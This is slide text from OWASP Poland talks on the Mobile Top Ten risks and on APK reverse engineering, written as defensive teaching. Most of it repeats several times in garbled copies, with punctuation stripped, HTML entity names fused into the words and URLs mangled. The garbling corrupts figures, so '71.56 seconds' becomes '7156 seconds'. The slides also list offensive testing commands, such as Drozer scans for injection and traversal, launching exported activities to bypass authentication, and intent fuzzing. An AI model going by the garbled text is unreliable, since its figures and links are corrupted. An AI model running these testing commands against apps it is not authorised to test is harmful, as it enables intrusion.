Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the APK using dex2jar (or Luyten for a more verbose result) and review the JAR file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – another application, via an intent/content provider
  – a shared file
  – a server response
  – a third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity to run, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
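An added example (not code from the slides) of the mitigations above in Android Java: a local-DB query with the value spliced into SQL beside its parameterised form, an implicit Intent beside an explicit one, and an allowlist check for URIs that arrive from outside the app. It assumes the Android SDK; the table, action string, activity and package names are hypothetical.

```java
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.net.Uri;
import java.util.Arrays;
import java.util.List;

public final class ClientSideInjectionMitigations {

    // Hosts this app is willing to act upon (constructed allowlist).
    private static final List<String> ALLOWED_HOSTS = Arrays.asList("owasp.org", "www.owasp.org");

    // Before: the caller-controlled value is spliced into SQL, so whatever reaches this
    // method (another app via a content provider, a shared file, a server response)
    // also controls the query. Hypothetical "notes" table.
    static Cursor findNotesUnsafe(SQLiteDatabase db, String owner) {
        return db.rawQuery("SELECT _id, body FROM notes WHERE owner = '" + owner + "'", null);
    }

    // After: the value travels as a bound parameter and is never parsed as SQL.
    static Cursor findNotesSafe(SQLiteDatabase db, String owner) {
        return db.query("notes", new String[] {"_id", "body"},
                "owner = ?", new String[] {owner}, null, null, null);
    }

    // Before: an implicit Intent carries only an action string; any app declaring a
    // matching intent-filter can claim it (or trigger the chooser dialog from the slide).
    static Intent openSettingsImplicit() {
        return new Intent("com.example.app.action.OPEN_SETTINGS");   // hypothetical action
    }

    // After: the target component is named, so delivery stays inside this app.
    static Intent openSettingsExplicit(Context ctx) {
        Intent i = new Intent();
        i.setClassName(ctx, "com.example.app.SettingsActivity");     // hypothetical activity
        return i;
    }

    // When another app's component really must be used, at least pin the package.
    static Intent viewInPartnerApp(Uri data) {
        Intent i = new Intent(Intent.ACTION_VIEW, data);
        i.setPackage("com.example.partner");                            // hypothetical package
        return i;
    }

    // URIs received from outside (deep links, server responses, third-party pages) are
    // input too: accept only https to an allowlisted host before acting on them.
    static boolean isAllowedUri(Uri uri) {
        if (uri == null || !"https".equalsIgnoreCase(uri.getScheme())) {
            return false;
        }
        String host = uri.getHost();
        return host != null && ALLOWED_HOSTS.contains(host.toLowerCase());
    }
}
```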
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
  – a session expires (copy a cookie and try to use it after 30 minutes)
  – a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
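As an added example (not from the slides), a minimal server-side session store in Java that applies all four mitigations: tokens from a CSPRNG, an application-chosen TTL, destruction of a user's earlier sessions when the authentication state changes, and a sweep for tokens that were never used again. The class, the user name and the timeline are constructed.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;

public final class ServerSessionStore {
    private static final SecureRandom RNG = new SecureRandom();
    private static final Base64.Encoder B64 = Base64.getUrlEncoder().withoutPadding();

    static final class Session {
        final String userId;
        final Instant expiresAt;
        Session(String userId, Instant expiresAt) {
            this.userId = userId;
            this.expiresAt = expiresAt;
        }
    }

    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final Duration ttl;   // chosen per application, not left to a framework default

    ServerSessionStore(Duration ttl) {
        this.ttl = ttl;
    }

    // 256 random bits from a CSPRNG: unguessable, unlike a device ID or a counter.
    static String newToken() {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        return B64.encodeToString(raw);
    }

    // Successful login: destroy every earlier session of this user, then issue a new
    // token, so a change of authentication state never leaves an old token alive.
    String login(String userId, Instant now) {
        sessions.values().removeIf(s -> s.userId.equals(userId));
        String token = newToken();
        sessions.put(token, new Session(userId, now.plus(ttl)));
        return token;
    }

    // On every request: unknown or expired tokens are rejected; expired ones are purged.
    Optional<String> authenticate(String token, Instant now) {
        Session s = token == null ? null : sessions.get(token);
        if (s == null) {
            return Optional.empty();
        }
        if (!now.isBefore(s.expiresAt)) {
            sessions.remove(token);
            return Optional.empty();
        }
        return Optional.of(s.userId);
    }

    // Logout invalidates on the server; deleting the cookie on the client is not enough.
    void logout(String token) {
        sessions.remove(token);
    }

    // Tokens that were never presented again still expire and are swept here.
    int purgeExpired(Instant now) {
        int before = sessions.size();
        sessions.values().removeIf(s -> !now.isBefore(s.expiresAt));
        return before - sessions.size();
    }

    public static void main(String[] args) {
        ServerSessionStore store = new ServerSessionStore(Duration.ofMinutes(30));
        Instant t0 = Instant.parse("2016-02-24T10:00:00Z");       // constructed timeline
        String first = store.login("alice", t0);
        System.out.println("valid after 5 min:   " + store.authenticate(first, t0.plusSeconds(5 * 60)).isPresent());
        String second = store.login("alice", t0.plusSeconds(10 * 60));   // re-login kills `first`
        System.out.println("old token still ok:  " + store.authenticate(first, t0.plusSeconds(11 * 60)).isPresent());
        System.out.println("new token at 41 min: " + store.authenticate(second, t0.plusSeconds(41 * 60)).isPresent());
        System.out.println("swept:               " + store.purgeExpired(t0.plusSeconds(41 * 60)));
    }
}
```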
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → Java
Decompiling - Dex2Jar
• dex2jar:
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool:
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
bull Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali files
Demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or does it incorrectly
What do you mean, „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
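The pseudocode above as working Java (an added example, not the slides' code): the pinned certificate is the only entry of an in-memory trust store, so a server presenting anything else fails the handshake, which is the Drop_connection() branch. It assumes a PEM file with the expected certificate (on Android you would load it from a raw resource instead) and a placeholder endpoint URL.

```java
import java.io.InputStream;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.KeyStore;
import java.security.cert.Certificate;
import java.security.cert.CertificateFactory;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

public final class PinnedTlsClient {

    // Trust ONLY the pinned certificate, not the device's CA store: a certificate
    // issued by any other CA, however valid, is rejected during the handshake.
    static SSLContext pinnedContext(InputStream pinnedCertPem) throws Exception {
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        Certificate pinned = cf.generateCertificate(pinnedCertPem);

        KeyStore trustStore = KeyStore.getInstance(KeyStore.getDefaultType());
        trustStore.load(null, null);                       // empty, in-memory store
        trustStore.setCertificateEntry("pinned", pinned);

        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);

        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);      // no custom X509TrustManager
        return ctx;
    }

    // The Start_connection() branch. The default HostnameVerifier is deliberately left
    // in place: swapping in one that returns true is the "accepts all hostnames" bug
    // from the Hannover study, just as an empty checkServerTrusted() is "trusts all".
    static HttpsURLConnection open(URL url, SSLContext ctx) throws Exception {
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        conn.setConnectTimeout(10_000);
        return conn;
    }

    public static void main(String[] args) throws Exception {
        // Placeholders: path to the shipped certificate and the API endpoint.
        String pemPath = args.length > 0 ? args[0] : "pinned_server.pem";
        String endpoint = args.length > 1 ? args[1] : "https://api.example.com/";
        try (InputStream pem = Files.newInputStream(Paths.get(pemPath))) {
            HttpsURLConnection conn = open(new URL(endpoint), pinnedContext(pem));
            System.out.println("HTTP " + conn.getResponseCode() + " over pinned TLS");
            conn.disconnect();
        }
    }
}
```

Pinning the certificate itself means the pin must be rotated with every certificate renewal; pinning the public key or the issuing CA you control survives renewals of the leaf.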
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage refers to a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
